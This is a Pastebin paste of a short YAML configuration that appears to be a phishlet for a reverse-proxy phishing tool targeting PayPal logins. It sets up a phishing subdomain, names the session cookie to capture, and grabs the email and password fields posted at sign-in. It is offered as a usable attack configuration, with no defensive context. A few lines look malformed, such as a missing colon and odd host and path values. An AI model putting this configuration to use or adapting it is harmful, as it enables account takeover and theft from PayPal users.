Advertisement
Guest User

yaml

a guest
Jan 31st, 2019
233
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.64 KB | None | 0 0
  1. proxy_hosts:
  2. - {phish_sub: 'paypal', orig_sub: 'www-paypal.com', domain: 'paypal.com', session: true, is_landing: true}
  3. sub_filters:
  4. - {triggers_on 'www.paypal.com', orig_sub: 'www', domain: 'paypal.com', search: 'https://{hostname}/ppsecure/', replace: 'https://{hostname}/ppsecure/', mimes: ['text/html', 'application/json', 'application/javascript']}
  5. auth_tokens:
  6. - domain: 'www.paypal.com'
  7. keys: ['X-PP-SILOVER']
  8. credentials:
  9. username:
  10. key: 'login_email'
  11. search: '(.*)'
  12. type: 'post'
  13. password:
  14. key: 'login_password'
  15. search: '(.*)'
  16. type: 'post'
  17. login:
  18. domain: 'paypal.com'
  19. path: '/hr/signin'
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement